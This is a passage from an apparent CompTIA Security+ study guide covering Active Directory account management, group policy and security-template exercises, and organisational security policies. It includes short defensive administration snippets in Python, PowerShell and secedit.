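        re.search(r"[A-Z]", password),
        re.search(r"[a-z]", password),
        re.search(r"[0-9]", password),
        re.search(r"[^A-Za-z0-9]", password),
    ]
    return sum(1 for c in categories if c) >= 3

print(meets_complexity("P@ssw0rd", "duane"))   # True
print(meets_complexity("duane123", "duane"))   # False: contains the user name
print(meets_complexity("password", "duane"))   # False: only one character category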

Managing user accounts


Whether you're using Active Directory or local GPOs, managing user accounts is a three part process.

Exam Objective: CompTIA SY0-501 4.4.2.7, 4.4.3.4, 4.4.3.5, 4.4.3.6

1. Define a user policy with restrictions and best practices.


2. Enforce those policies with operating system controls.
3. Continuously review both security logs and user access settings to verify that enforcements are secure and
users are in compliance.
One easy way to review basic settings for a particular account is with the net user tool. To view any user
on the domain, type net user [username] /domain at the command line.

 Choose user names carefully according to a standard naming convention. Keep the needs of various
elements of security and usability in mind when assigning them:
• To protect against attackers, user names should not be easy to guess just knowing the name or job role
of the account owner.
• For usability, it should be easy for users to remember their own names, and for help desk employees to
find the account of a particular user.
• For auditing purposes, user names should never be changed, and should allow easy filtering for
creating reports.
 Set account policies that encourage strong passwords, without making users prone to constantly lock
themselves out, or worse, start writing their passwords on post-its.
 Allow users to choose their own passwords, and don't ask them to tell you. When you must reset a
password, choose a secure temporary value and require it to be changed on next login.
 Configure a lockout policy that will require an administrator to unlock the account after successive
failed logons.
 Apply credential management using automated tools such as Windows Credential Manager.


 Where possible, assign permissions to groups rather than individual accounts. It's easier to add or
remove group members than it is to make permissions changes to multiple accounts.
 Where possible, avoid use of generic accounts, such as guest accounts or any others shared by multiple
users. As convenient as they are, they're harder to monitor, individually log, and otherwise keep secure.
 Assign administrators two accounts apiece: an administrator account for tasks which require escalated
privileges, and a normal user account for all other work.
 When giving multiple accounts to a single user, make sure that each account has its own separate
password. Otherwise, someone gaining access to one gains access to all.
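As a rough sketch of several of these practices (assuming the ActiveDirectory PowerShell module, and using example names and an example OU path), you could create a standard user who follows a first-initial-plus-surname naming convention, force a password change at first logon, and grant access through a group rather than the individual account:

    # Example only: the name, temporary password prompt, OU path, and group are placeholders
    Import-Module ActiveDirectory
    New-ADUser -Name "Dana Smith" -SamAccountName "dsmith" `
        -AccountPassword (Read-Host -AsSecureString "Temporary password") `
        -ChangePasswordAtLogon $true -Enabled $true `
        -Path "OU=Staff,DC=mwha,DC=local"
    # Assign permissions through group membership instead of editing the account directly
    Add-ADGroupMember -Identity "Accounting Users" -Members "dsmith"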

Auditing user accounts


Setting up accounts properly is only the first part. You also need to keep track of how they're used, change
settings and permissions when circumstances warrant, and make sure account settings aren't changed without
your knowledge.

Exam Objective: CompTIA SY0-501 4.4.2.3, 4.4.2.4, 4.4.2.6, 4.4.2.8

 Ensure auditing logs are enabled, and review them regularly. The required frequency depends on the
system and its level of sensitivity.
In the Group Policy Management Editor, you can change auditing settings by navigating to Policies >
Windows Settings > Security Settings > Local Policies > Audit Policy.
 Disable accounts that are no longer needed.
• In addition to disabling accounts manually, you can set an automatic expiration date for temporary
accounts on the Account tab of the Properties window.
• Deleting accounts can be a problem if you want them back later, and might violate regulatory
requirements for data retention. Instead, consider moving disabled accounts to an "inactive" OU for
extra security.
 Regularly review and recertify active accounts to make sure they have all permissions they need, but no
more.
 If the auditing and automation tools built into Active Directory or any other account management system
aren't sophisticated enough to meet your needs, look into third-party scripts or tools.
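Even with the built-in tools, you can script parts of this review. For example, with the ActiveDirectory PowerShell module (the 90-day window, account name, and date below are only examples):

    # Check which audit categories are currently being logged
    auditpol /get /category:*
    # Find user accounts with no logon in the last 90 days and disable them
    # (in practice, review the list before piping it to Disable-ADAccount)
    Search-ADAccount -UsersOnly -AccountInactive -TimeSpan 90.00:00:00 |
        Disable-ADAccount
    # Give a temporary account an automatic expiration date
    Set-ADAccountExpiration -Identity "contractor1" -DateTime "2018-06-30"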

Exercise: Using group policy objects


In this exercise, you'll use GPOs to secure the Active Directory environment.
Do This How & Why

1. In the Windows Server 2012 VM,


view installed group policies.

a) In Server Manager, click Tools > The Group Policy Management console opens.
Group Policy Management.


b) On the left, expand Forest: All that's presently there is the Default Domain Controllers
:mwha.local > Domains > Policy and Default Domain Policy.
mwha.local > Group Policy
Objects

2. Edit the default domain policy. You can view it in the management window, but you can't edit it there.

a) Right-click Default Domain Policy The Group Policy Management Editor console opens.
and click Edit.

b) In the left pane, navigate to


Computer Configuration >
Policies > Windows Settings >
Security Settings > Account
Policies > Password Policy.

c) Examine the existing settings. According to the present configuration, passwords must be at
least 7 characters and meet complexity requirements. They
must be changed every 42 days, can only be changed once per
day, and a history of 24 passwords is remembered.

3. Change the password policy.

a) Double-click Enforce Password The Properties window opens.


history.

b) Edit the Keep password history


for value to 10.

c) Click OK. To close the Properties window.

d) Edit Maximum password age to Double-click it and edit the value.


90 days.


e) Edit Minimum password length to


10 characters.

4. Add new lockout policies. You'll set a policy to lock users out after enough failed logon
attempts.

a) In the left pane, click Account By default, an attacker can just keep trying to guess the
Lockout Policy. password as long as they like.

b) Define new settings as follows. In the Properties window, you'll have to check Define this
policy setting to enter a value for the first time.

5. Restrict membership to the Domain You want to make sure no one changes the group's
Admins group. membership from Active Directory, even by mistake.

a) On the left, click Restricted


Groups.

b) Right-click the empty right pane The Add Group window appears.
and click Add Group.

c) Click Browse. The Select Groups window appears.

d) Type Domain Admins and click To close both windows. You're prompted to set group
OK twice. membership properties.

e) To the "Members of this group Click Add and enter them. You can separate multiple names
section, add Administrator with a semicolon.
and Duane Anderson.

f) Click OK. You won't modify what groups Domain Admins belongs to.
The group and its members appear in the right pane.


6. If time allows, restrict the Enterprise


Admins, Schema Admins, and
Administrators groups.

7. Close the Group Policy Management


and Group Policy Management
Editor windows.

The Domain Admins group at the end of the exercise.

Security templates
Group policies allow you to alter almost every aspect of how Windows security works, not just those
regarding user account management. Changing so many settings is a lot of work. The ability to override local
GPOs with Site, Domain, or OU GPOs lets you save a lot of time over configuring a wide range of computers
separately, but across a whole organization it still might mean a lot of work and chances for error.

Exam Objective: CompTIA SY0-501 2.8.2


To further automate the security process, Windows allows you to create security templates, text-based files
which specify a list of security settings. When you want to configure a GPO to meet security baselines, all
you need to do is import the template and its settings will be applied to any computers affected by the GPO.
You can create and manage templates using the Security Templates snap-in for MMC. The template files
themselves are stored by default in C:\Users\[Username]\Documents\Security\Templates.
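To give a rough idea of the format, the password- and lockout-related portion of a template might look something like this (the values shown are only illustrative):

    [System Access]
    MinimumPasswordAge = 1
    MaximumPasswordAge = 60
    MinimumPasswordLength = 10
    PasswordComplexity = 1
    PasswordHistorySize = 12
    LockoutBadCount = 5
    ResetLockoutCount = 30
    LockoutDuration = 30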


A security template opened in Notepad

You can also use security templates as an auditing tool. The Security Configuration and Analysis snap-in
allows you to analyze a computer against a template to see how its effective security settings measure up to a
baseline. Not only can this help you find settings that are configured improperly, it can help you make sure
the combination of GPOs applying to a given computer haven't caused undesirable results.

Using security templates


Creating, applying, and auditing with templates each have a different process.

 To apply an existing template, use the Group Policy Editor console.


a) Navigate to Computer Configuration > Policies > Windows Settings.
b) Right-click Security Settings and choose Import policy.
c) Navigate to the template file.
 To create a new template, use the Microsoft Management Console.

a) If necessary, add the Security Templates snap-in by clicking File > Add/Remove Snap-in.
b) Select the folder where you want to create the template.
c) Click Action > New Template.
d) Name and describe the template, then click OK.
e) Navigate into the template and configure it like you would a GPO.
Any setting left Not defined won't be saved in the template file.
f) When you're finished, right-click the template and click Save.


 To compare a computer's current configuration to a template, use the MMC.

a) If necessary, add the Security Configuration and Analysis snap-in by clicking File > Add/Remove
Snap-in.
b) Right-click Security Configuration and Analysis and click Open Database.
c) Choose a database file and click Open.
To create a new database, type a new file name of your choice.
d) If you're creating a new database, choose a template file to compare to the computer, and click Open.
e) Right-click Security Configuration and Analysis and click Analyze computer now.
f) Browse through the policy tree to compare the template (database) setting against the current computer
settings.
 You can also apply a template from the MMC.
a) Use the Security Configuration and Analysis snap-in to create a database and import a template.
b) Right-click Security Configuration and Analysis and click Configure computer now.
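If you prefer the command line, the built-in secedit tool can perform roughly the same export, analyze, and configure steps; the database, log, and template paths below are only examples:

    secedit /export /cfg C:\Temp\current-settings.inf
    secedit /analyze /db C:\Temp\baseline.sdb /cfg "Password Baseline.inf" /log C:\Temp\analyze.log
    secedit /configure /db C:\Temp\baseline.sdb /cfg "Password Baseline.inf" /log C:\Temp\configure.log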

Exercise: Creating a security template


Do This How & Why

1. In Windows Server 2012, open the You want to create a password policy baseline you can use for
Security Templates MMC snap-in. all GPOs in the network. The functionality is in MMC, but you
have to add the right snap-in first.

a) At the Start screen, type MMC

b) Click MMC.

The Microsoft Management Console opens.

c) Click File > Add/Remove Snap-in. A list of available snap-ins appear.

d) Double-click Security Templates. To add it to the selection snap-ins.

e) Add the Security Configuration You'll need this one later.


and Analysis snap-in.


f) Click OK.

The snap-ins are added to the console.

2. Create a new security template.

a) In the navigation pane, expand Security Templates and select the default folder. By default,
templates are stored in C:\Users\Username\Documents\Security\Templates, but you can
add other folders.

b) Click Action > New Template. You're prompted to add a template name and description.

c) Name the template Password


Baseline and click OK.

Add a suitable description if you like. The Password Baseline


template appears in the navigation pane.

3. Configure the new template. You'll set a default password policy that can be used through
the entire organization.

a) Navigate to Password Baseline > It looks just like navigating a GPO, except that the default
Account Policies > Password value for every policy is "Not defined."
Policy.

b) Configure the visible policies as


follows.

12 passwords remembered, maximum age of 60 days,


minimum age of 1 day, 10 character minimum, must meet
complexity requirements, and not stored using reversible
encryption.

c) Right click Password Baseline and To save the policy.


click Save.

4. Load the template as a baseline for You could do this on any computer you wanted, by copying
configuration and analysis. the template file.


a) In the navigation pane, collapse the Just to get it out of the way.
Security templates snap-in.

b) Right-click Security The Open Database window appears. By default it's in


Configuration and Analysis and Documents\Security\Database, but no databases
click Open Database. have been created yet.

c) Type Baseline Check and You're prompted to import a template into the database. By
click Open. default, the contents of
Documents\Security\Templates are displayed.

d) Open Password Baseline. You can now compare this computer to the template, or
configure it to match the template.

5. Check this computer against the


template.

a) Right-click Security You're asked where to log error files.


Configuration and Analysis and
click Analyze computer now.

b) Click OK. It opens in the navigation pane, so you can move through it
like any policy.

c) Navigate to Security
Configuration and Analysis >
Account Policies > Password
Policy.

To view a comparison between the database settings and those


on this computer. Some of the settings you placed on this
computer earlier match the template, but your new baseline
requires a longer password history and a lower maximum
password age.

d) Navigate to Security Since you didn't configure any of these policies in the
Configuration and Analysis > template, they all have a Database Setting of Not Defined.
Account Policies > Account
Lockout Policy.

6. Configure the computer to match the


policy.

a) Right-click Security You're asked where to log error files.


Configuration and Analysis and
click Configure computer now.

b) Click OK. It opens in the navigation pane, so you can move through it
like any policy.

c) Analyze the computer again. Click Action > Analyze computer now.


d) View the password policy. This time all policies are flagged as green, matching the
database.

7. Close the MMC console. If prompted, don't save your settings.

Assessment: Account management


1. What order does Windows process GPOs in?

1. Child OU GPO

2. Domain GPO

3. Local GPO

4. Organizational Unit GPO


5. Site GPO
2. Where is the best place to assign permissions?
 A domain local group
 A global group
 An individual user
 A universal group

3. When you enforce password complexity in Windows, you can't edit the precise complexity requirements.
True or false?
 True
 False

4. During a discussion of user account policies, someone suggests lowering the account lockout threshold on
the Windows domain. What would be the net effect of this change? Choose the best response.
 Less secure, and less trouble for users
 Less secure, but more trouble for users
 More secure, but less trouble for users
 More secure and more trouble for users

5. When it's so important to change passwords regularly, why would you set a minimum password age?
Choose the best response.
 To keep users from choosing simple passwords
 To keep users from bypassing history requirements
 To prevent attackers from easily cracking passwords
 To make sure users change their passwords regularly


Summary: Access control


You should now know:
 About access control models, including DAC, MAC, and both interpretations of RBAC. You should
also be able to set and interpret file access permissions and inheritance.
 How to manage user accounts, groups, and OUs in Active Directory, and how to secure systems and
networks using Group Policy Objects.



Chapter 10: Organizational security
You will learn:
 How to design security policies
 About user training practices
 How to physically secure assets and manage safety controls


Module A: Security policies


Even if you know exactly the risks your organization faces, and just how you want to mitigate them, you're
not ready to just go and do it. Security policies are the first management controls you need to set, and if
they're not effectively designed and clearly communicated, there's no way to be sure that everyone knows
how to reliably do their part in applying and maintaining secure practices. Different parts of the overall policy
will need to specify the responsibilities of administrators, users, and managers in creating and maintaining a
secure organization. Other parts will define how your organization interacts with the rest of the world,
whether complying with security regulations or engaging in agreements and partnerships with other entities.
You will learn:
 About security policies
 How to plan secure user and personnel policies.
 About common business contracts
 How to address security concerns with third-party data access.

Security documentation
While you could just identify risks and apply controls to minimize them, the only way to be sure you're not
leaving anything out, especially in an organization of any size, is to have a documented plan for each step you
take, as well as supporting documents and methodologies to tie the big picture together. Ideally, these
documents should cover your organization's overall business strategies and security goals, while tying in all of
the details such as valuable information assets and systems, the security controls that must protect them, and
how both inside and outside users interact with them.
In other words, these documents are the components used to actually achieve security. You might hear them
called frameworks, policies, controls, procedures, guidelines, standards, and so on. Each of these has a
specific meaning, even if there's a lot of overlap between them.

Framework A program or blueprint that documents the overall processes you need to design policies that
achieve specific security needs. A good framework is designed and maintained by a
certification body or standards organization drawing from the practices and experiences of a
wide range of policy professionals and organizations with similar needs. It may include a
wide variety of more specific documents, or it might just be a structure for you to develop
your own.
Policies A statement describing how the organization is to be run, from the perspective of management
intent. A policy reflects the intent and goals of the organization, and generally is written for
broad audiences rather than strictly technical personnel. Compliance with policies is
mandatory for all employees or users; any exceptions defining when policies should be
disregarded must themselves be documented as policies. "User accounts must be protected by
strong passwords" might be found in a policy.
Standards A definition of specific methodologies or requirements needed to satisfy policies. Standards
are also mandatory, but tend to have a more technical and specific focus than policies.
"Passwords must be at least eight characters long and contain letters, numbers, an special
characters" might be found in a standard.
Guidelines Descriptions of best practices or recommendations for achieving a certain policy goal. In
theory, guidelines are optional and leave room for interpretation. In practice, just how
"optional" a given guideline is varies. Advice on how to design a strong password might be
found in a guideline.


Benchmark A checklist of potential vulnerabilities in a piece of software along with configuration settings
you can use to harden it. Also known as a secure configuration guide. A benchmark might be
for a particular product such as an operating system, service, application, or network device. It
might also be for a generic type instead of a specific product. A benchmark for Windows
Server would tell you to make sure domain policies are set to require complex passwords.
Procedures Specific and ordered instructions for complying with a particular element of a policy or
standard. Procedures are mandatory, and written for whoever will actually perform them. In
general, a procedure represents a short-duration task, while long tasks are called processes
and contain multiple procedures. The steps needed to change or reset a password would be
written as a procedure.
Controls Any safeguard or countermeasure designed to reduce security risks. Security policies and
procedures themselves are controls, but when you see "control" used as a contrasting term it
generally means a physical or technological tool that enforces policy goals. The password-
protected login system itself is a logical control, as is the password complexity enforcement
that rejects new passwords if they don't meet the standard.

Regulatory compliance
Ultimately, the goal of security policies is to make sure the organization follows best practices in protecting its
informational assets. In a simple world, this would just be a matter of calculating risks and then finding the
controls and procedures that minimize them. This simple approach only works in a perfect world where no
one has misconceptions about what's needed, no one cuts corners, and no one acts in bad faith implementing
security procedures - in short, a world where cybersecurity probably isn't needed anyway. For this reason,
security policies often are subject to external requirements, especially when your organization handles data
owned by other people.
Regulations depend both on your organization and the legal jurisdiction it's in, but in the US some important
ones include the following:

SOX The Sarbanes-Oxley Act of 2002 is a federal law that applies to publicly traded companies and
public accounting firms that do business in the United States. It specifies how company
financial data must be retained and protected from undocumented changes.
FISMA The Federal Information Security Management Act is a law applying to all federal agencies. It
requires every agency to develop, document, and implement an information security and
protection program.
HIPAA The Health Insurance Portability and Accountability Act specifies who can access or use PHI,
and defines security standards for its storage and access.
FERPA The Family Educational Rights and Privacy Act defines who can access student educational
records, and how that data must be protected.
GLBA The Gramm-Leach-Bliley Act sets minimum standards for the security of PII stored by financial
institutions, and requires said institutions to inform customers how their data will be used or
shared.
PCI DSS The Payment Card Industry Data Security Standard isn't a law; instead, it's administered by the
PCI Council, an industry consortium. The standard governs the storage, processing, and
transmission of payment card information, and compliance is part of the standard business
contract for any organization that wants to process payment cards.

Failure to comply with regulations does more than just hurt your organization's reputation: it can lead to stiff
fines and other legal penalties, even if you never actually suffer an attack that compromises the protected data.
Regulatory compliance is a complex field, but it's something that must be done whether or not a specific
regulation improves security in a practical sense. If you're in a policy shaping role it's your duty to research


and learn exactly what regulations apply to your data. If you're not, it's still a good idea to know the basics of
regulations applying to your organization. That knowledge will help you to understand exactly why your
organization's security policies and procedures are important, and how to comply with them in spirit as well
as in letter.

Policy frameworks
Since cybersecurity needs are complex and change over time, it's difficult to design a comprehensive security
approach no matter how much you know about the topic. One helpful point to remember when you're setting
up any policy structure is that your needs probably aren't as unique as you'd think. For the most part your
goals, assets, and available resources are going to be similar to those of thousands of other organizations.

Exam Objective: CompTIA SY0-501 3.1.1


You can save a lot of time and risk by choosing a policy framework that suits your business and security
needs. While the framework isn't a complete organization-specific policy set, it should contain detailed advice
and techniques you can use to design a set of customized policies. Additionally, since it uses common
language and structures, it's easy to learn from the successes or mistakes of other organizations that share your
framework.
There are several common frameworks in use both for information technology in general and for security in
particular. Some popular ones include the following.

NIST The NIST 800 series is a policy framework describing cybersecurity standards and best
practices for the US federal government. While it's designed for government agencies to
follow, it contains a lot of useful guidelines for other organizations as well, and is available
free of charge. The related but separate NIST Cybersecurity Framework is a shorter, high-
level security framework designed to give standard guidelines and language for cybersecurity
in the private sector.
ISO The ISO 27000 series is a very broad policy framework containing security guidelines for all
sorts of organizations. It's a very comprehensive framework with specific documents for
individual security areas. Like other ISO standards, it also includes a certification process so
that you can demonstrate your compliance to business partners.
COBIT The Control Objectives for Information and Related Technologies is a framework published
by ISACA, an IT professional association. The most recent version is COBIT 5, which is a
popular framework for complying with Sarbanes-Oxley rules.
ITIL The Information Technology Infrastructure Library is published by AXELOS, a joint venture
of the UK government and Capita plc. Compared to similar frameworks such as COBIT, ITIL
is more focused on the service aspect of IT, providing more detail in specific implementation
but less on underlying principles.

Which you should use depends on your needs: some are easier to implement, some are more comprehensive,
and others are particularly suited to compliance with specific regulations. You might even incorporate
multiple frameworks. Look for frameworks that are required by or designed to support regulations you need
to comply with, or which are part of your national security guidelines.
Even if you don't need to use a specific framework for regulatory purposes, also consider what frameworks
your potential business partners and customers use. Sharing a framework will make it easier to share data and
infrastructure securely. Additionally, compliance with a formal framework can demonstrate to others that you
take security seriously. For example, ISO 27001 certification is a complicated process, but in some industries
it's a valued demonstration of security commitment.


Secure configuration guides


Frameworks and policies are often broad, high-level treatments that help you to spell out what security
needs you have and what kinds of controls will address them. On the other hand, they usually leave a lot of
details optional or up to interpretation, especially when it comes to specific hardware and software products.
This means creating your own secure baselines for system configuration and auditing will take extensive
technical knowledge and a lot of research. It's much easier and more reliable to find a secure configuration
guide that either matches the specific products you're using, or at least a more general guide that can be
customized to your software and devices.

Exam Objective: CompTIA SY0-501 3.1.2


Security standards organizations are always eager to give advice on applying controls and hardening your
network. One of the best places to look is on the CIS website at
https://www.cisecurity.org/cybersecurity-tools/. It offers both free documentation
about choosing and enacting specific security controls, and more comprehensive benchmark documents
describing how to secure specific products such as:
 Workstation, server, or mobile operating systems
 Web and application servers
 Network infrastructure devices
 Web browsers and other desktop applications

A given guide can be a very exhaustive document. The benchmark for Windows 10 Enterprise is over 900
pages, and describes a long list of operating system settings that affect security. For each, the document
describes why it is important, what values you should use depending on your intended level of security,
how to audit that it is set correctly, and how to remedy the issue if it is not. It also describes what negative
impacts each security control may cause.
Since manually verifying configurations is a lot of work and prone to human error, where possible it's best to
integrate the advice from configuration guides into automated compliance checkers or configuration scripts.
With their benchmarks, CIS offers automated auditing scanners, remediation tools, and even pre-hardened
virtual system images. Other vendors have similar products. Most of these are not free, but they have the
potential to save your organization money and reduce the chance of error.
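As a trivial illustration of that kind of automated check (not a CIS tool, just a sketch), a script could compare a local setting against a benchmark-recommended value and report any drift:

    # Minimal example: most Windows benchmarks recommend leaving User Account Control enabled
    $policy = Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
    if ($policy.EnableLUA -eq 1) {
        Write-Output "EnableLUA: compliant"
    } else {
        Write-Output "EnableLUA: NOT compliant - the benchmark expects UAC to be enabled"
    }

A real compliance checker loops over hundreds of such settings and reports each against the benchmark's recommended value.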

Discussion: Security documentation


1. What's the difference between a standard and a policy?
They have a lot of overlap, but generally a standard is a mandatory set of technical requirements used to
meet a policy.
2. What regulations are particularly relevant to your organization?
Answers may vary by jurisdiction and field of business.
3. You're creating a whole new set of security policies. What would you use to choose a policy framework?
Important questions include the nature of your organization, what regulatory requirements apply to it,
and what will make it easier to work with potential business partners.
4. In your browser, navigate to https://www.cisecurity.org/cis-benchmarks/. Which of
those benchmarks could you use to securely configure your network?
Answers may vary, but there are a wide variety for specific platforms and general categories.


Typical policies
Creating an effective security policy isn't easy: it needs input from administrators, human resources, senior
management, and legal staff, and it has to address both organizational goals and technological details.

Exam Objective: CompTIA SY0-501 2.3.9.1, 5.1.1


A security policy might be a single comprehensive document, or a set of multiple documents applying to
different aspects of security. Either way, it needs to be viewed as a functional whole, with high-level
statements explaining the organization's overall security goals and the measures, possibly in some detail, that
should be taken to achieve them. The core policy document doesn't necessarily have to cover every detail—
the security controls you'll design based on the policy don't only include technical controls, but operational
and management procedures that will require separate documentation of their own. The boundaries can be a
bit fuzzy, but in general policies are the top-level management controls that identify security needs, while
other controls are used to enforce policies.
For example, if your risk assessment identified a need for network firewalls, your network security policy
should specify when firewalls should be deployed, what capabilities they must have, and maybe even what
vendors are acceptable. The firewalls themselves, and the procedures for installing and configuring them, are
security controls used to enforce the network policy.
A security policy exists on multiple levels, and affects a lot of different people and assets with different roles
and knowledge levels. Every part needs to be written in language that will be clear to those it affects:
 For managerial staff, the policy needs to include a high level outline of the organization's goals, and the
steps that will be taken to achieve them. This outline will be used as the guiding principle for the
others, and should address several elements.

• The issues the policy is meant to address


• Legal or regulatory requirements relevant to the organization's IT services
• Who has access to what information
• What activities, processes, and actions will be necessary to enact the policy
• How employees are expected to comply with the policy
• The consequences for noncompliance
• Procedures for revising or changing security policies

 For IT administrators and technicians, policies need to include technical documentation about how
informational assets will be secured.

• General guidelines for best practices and security goals


• Technological standards in use through the network
• Procedure documents for specific configuration or maintenance tasks
• User permissions policies, including local and remote access as appropriate
• Data disposal policies, for secure erasure or destruction of sensitive data on discarded media.

 Acceptable use policies (AUPs) target end users, who may be employees or customers using hosted
services. Each of the two will likely have a different AUP.

• Secure practices and guidelines for use of network resources, appropriate to the user's access level
and technological knowledge
• Codified expectations of user privacy, and consent to security-based monitoring of user activity


• Guidelines for creating and maintaining secure passwords

 Asset management policies govern the tracking of hardware and software assets through the whole life
cycle of procurement, deployment, and disposal.
 Incident response policies specify exactly what steps will be taken in response to a security incident, in
order to minimize and repair damage without exposing the network to further risk.
 Disaster planning and business continuity policies specify the steps that will be taken to secure assets,
protect staff, and maintain business operations in the event of natural or man-made disasters and disruptions.
 Change management policies provide guidelines for updating policies and procedures to suit changing
needs, without introducing new vulnerabilities.
 Standard operating procedures (standing operating procedures in military organizations) are lists of
step-by-step instructions to perform routine tasks. Procedures aren't traditionally considered policies
themselves, but policies should specify how procedures are developed, stored, and taught to employees.

Policy documents
Policy documents should follow a clear and consistent standard to avoid confusing their intended audience or
leaving doubt as to which of multiple policies applies in a given situation. When you design them, it's a good
idea to check existing policies from other organizations for ideas you might have overlooked. You can also
look for recommendations from security organizations. ISO 27002:2013 is a popular standard that specifies
best practices for information security management.
When it comes to the actual format of the document, a typical security policy might contain the following
sections:

Overview Plainly states the purpose of the policy. In the case of security, this should
include the risk being addressed and how the policy will minimize it.
Scope Defines where the policy applies. Scope can include what employees need to
follow it, or what organizational divisions and systems it affects.
Policy details The actual rules defined by the policy: essentially a list of dos and don'ts. This
may be broken into sections, and it may refer to external procedures, standards,
and other guidelines not contained within the document.
Enforcement and auditing Defines who is responsible for verifying that the policy is followed, and what
consequences there are for policy violations.
Definitions A list of technical or professional terms, external standards or documents, or
other elements that a reader of the policy needs to know in order to fully
understand it.
Revision history A list of dates when the policy has been changed, as well as who made and
authorized each change. This is important to make sure all parties are up to date
and to verify that past activities were in compliance with the policies in place at
the time.


Acceptable use and privacy policies


Technical controls such as access permissions can limit the harm a careless or malicious end user can do, but
they can't eliminate it. Every organization needs a formal acceptable use policy (AUP) specifying how
employees are allowed to use company resources, such as hardware, software, and network services. If your
organization provides user services to outside customers, they'll need their own, separate AUP.

Exam Objective: CompTIA SY0-501 5.1.3.9


The goal of any AUP is to prevent user behavior that compromises security, hurts performance, or damages
your corporate reputation. For instance, even if your office is pretty tolerant about letting employees use the
network for personal communications, it's still unacceptable if they install questionable software on their
workstations, spend all day on social networking sites instead of working, or use a work account to send
harassing email to people. Even what sounds like common sense to one user needs to be spelled out to
another.
For an AUP to be enforceable rather than a list of friendly suggestions, it must specify what consequences
management will take in case of violation. Additionally, users must be required to sign or otherwise provably
affirm that they have read it before they access any company resources. Otherwise, you might not be able to
do much about abuses: firing an employee for "policy violations" without being able to show just what terms
the employee agreed to and then violated can be grounds for an unlawful termination suit. For internet or remote
access services, you'll also need to specify the legal jurisdiction, generally your central location, which
governs any legal action resulting from policy violations.
Acceptable use policies vary widely between organizations, depending on their security needs and
management philosophies, but they typically include use of the following:

Internet A restrictive internet policy could prohibit any personal internet use on company
systems. More often, personal use is allowed with restrictions on inappropriate or
offensive content, resource-intensive or legally questionable P2P file sharing, and
excessive time spent on social networks or personal email during business hours.
Network policies might also define the remote access or VPN solutions used by
employees who are traveling or working from home.
Company accounts Use of company email accounts, website or social media accounts, or any other
resources that associate the user with the organization itself need special scrutiny.
Misuse of these resources can cost money, damage business relationships and
public reputation, or even open the organization itself to legal consequences—
users given access to them must agree to use them appropriately.
Hardware and software Policies should define both what hardware and software users have access to and
what changes they can make. A restrictive workplace might prevent any changes
to workstation configurations and strictly define what software can be used for
what tasks. Even a permissive company should regulate employee software
installation or configuration changes that might hurt performance or compromise
security. Software policies might have particular requirements for personal
systems: for example, a home computer used for work or joined to the company
network should be kept up to date and have approved antivirus software.
Mobile devices Every company today needs policies regarding laptops and mobile devices
brought to the workplace or used for work tasks, whether they're personal or
company owned. These policies should address personal use of devices, security
settings, what devices are permissible for work phone and email use, and what to
do if a device is stolen. They should also address network connections, both of
personal devices to work networks, and company devices to non-work networks.
In some high-security environments, mobile devices might be forbidden entirely.


Hand-in-hand with an AUP you need to establish a privacy policy defining just what user information and
activities will be recorded and monitored, and how it will be used by the company. Users naturally assume
that their behavior and information will be private and untraced, even when they're using secure corporate
systems that must carefully log user activity, and they might unreasonably resent even mild monitoring when
it comes to light. Laws and industry regulations might restrict how user data, especially of outside customers,
can be collected or shared without explicit consent. To avoid misunderstanding, policies should not only be
made clear to all users, but any changes in them should also be communicated.

Password policies
Passwords are widely used throughout information security, by administrators and end users alike. They're the
easiest kind of credentials to use, and while they can be very secure they're also very easy to screw up.
One half of the problem is administrative. Passwords are prime targets for data theft, and a number of high
profile data breaches in recent years have resulted in the theft of unsecured or poorly secured user data. Even
on interior servers, passwords need to be stored securely, typically in hashed and salted form. They should
never be transmitted in clear text over the network.
The other half is user policies. In today's networks, users, whether employees or customers, might have to
manage a lot of passwords in their daily lives. If left to themselves, they'll use very simple passwords, reuse
them for account after account, and share them with others. It's not hard to tell that that's a security nightmare.
To solve it, you need a policy requiring strong passwords, ideally enforced by technical controls such as
domain policy settings.
How to design a password policy is a heavily debated topic in security circles. While it's generally agreed that
passwords should be hard to guess and frequently changed, if you make them too hard for users to remember,
they're either going to be constantly locked out of the system, write their passwords on post-it notes, or
otherwise compromise the system's performance or security. Typical password policies address the following
elements.

Length Short passwords are easily cracked. Most experts recommend at least 8-12
character passwords for strong security, longer if they're not sufficiently complex.
Complexity Passwords should never be easily guessed words or patterns, or based on
employee or user names. Even if it's not a totally random string, a complex
password should contain a mix of upper- and lower-case letters, numbers, and
special characters.
Duration The longer a password is used, the more likely it is to be leaked or discovered.
Requiring passwords be changed periodically, typically every 30 to 90 days,
reduces this risk.
History Switching back and forth between two passwords isn't much more secure than
using the same one all the time, so recording password history makes sure new
passwords are just that, new. Secure password policies might store 12-24 prior
passwords. When password history is enforced, it's common to also restrict how
often a password can be changed: this prevents a lazy user from changing
passwords a dozen times in ten minutes just to not have to remember anything
new.
Sharing and storage Personal accounts and passwords obviously should not be shared with anyone
else. They should also not be written down or otherwise stored in non-secure
locations. In cases where passwords or encryption keys do need to be backed up or
communicated, there should be a secure method for doing so.
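On a Windows domain, most of these elements map directly to settings you can read back with the ActiveDirectory PowerShell module, which makes it easy to confirm that the technical controls match the written policy (a quick check, assuming the module is installed):

    # Shows minimum length, complexity, maximum and minimum age, history count, and lockout settings
    Get-ADDefaultDomainPasswordPolicy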


Human Resource policies


Human Resources personnel are a vital link in maintaining organizational security. When designing policies,
you should consider the role of HR in every step of the employment cycle.

Exam Objective: CompTIA SY0-501 4.4.2.2, 5.1.3.5, 5.1.3.6, 5.1.3.7

Hiring Most hiring policies are designed not only to ensure applicants are qualified for the job, but
to weed out those who might be untrustworthy or unreliable. It's especially important
when hiring someone for a position with access to valuable resources. Secure hiring
processes make use of interview questions, background checks, and legal contracts like
NDAs or non-compete agreements to make sure that new employees can be trusted with
sensitive information.
Training HR personnel should oversee the orientation and ongoing education of employees, and
security is no exception. Even if specific training procedures are conducted by relevant
technical staff or trainers, it's HR's duty to make sure that all employees are qualified to
securely perform their duties. The onboarding process should also include setting up user
accounts, credentials, and whatever else is technically needed for the position.
Enforcement HR should include security concerns in ongoing employee evaluation and review processes,
and oversee remedial or disciplinary measures in response to security incidents or policy
violations.
Termination When employees leave for any reason, HR must see that their security credentials are
revoked, their accounts disabled, and any critical duties and permissions they have are
immediately passed on to another suitable employee through a formal offboarding process. If
an employee's termination is conducted on unfriendly terms, it is important that HR
communicate with network administrators to revoke permissions quickly: this reduces the
chances of any malicious actions on the way out. An exit interview is also important, both to
gain information about the employee's experiences and reasons for departure, and to identify
any employee knowledge about business operations which has not been documented.
